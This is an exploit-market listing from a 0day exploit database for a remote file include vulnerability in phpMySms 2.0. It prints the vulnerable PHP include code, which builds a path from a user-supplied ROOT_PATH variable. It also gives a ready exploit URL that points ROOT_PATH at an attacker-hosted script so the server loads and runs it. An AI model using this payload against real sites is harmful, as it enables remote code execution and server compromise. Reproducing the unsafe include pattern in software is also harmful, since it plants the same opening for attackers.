[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

phpMySms 2.0 (ROOT_PATH) Remote File Include Vulnerability

Author
Persian-Defacer
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-543
Category
web applications
Date add
23-06-2006
Platform
unsorted
==========================================================
phpMySms 2.0 (ROOT_PATH) Remote File Include Vulnerability
==========================================================




PhpMySms <= V2.0 (ROOT_PATH) Remote File Include Vulnerability
URL : Http://www.phpmysms.com
 
Author=Persian-Defacer
==============================================================
if (($_POST[mode] == "1") or ($_GET[mode] == "1")) {
include ("config.php");
} else {
include ("$ROOT_PATH/config.php");
}
==============================================================


Exploit : http://[site]/[sms location]/sms_config/gateway.php?ROOT_PATH=[evil_script]



#  0day.today [2024-12-25]  #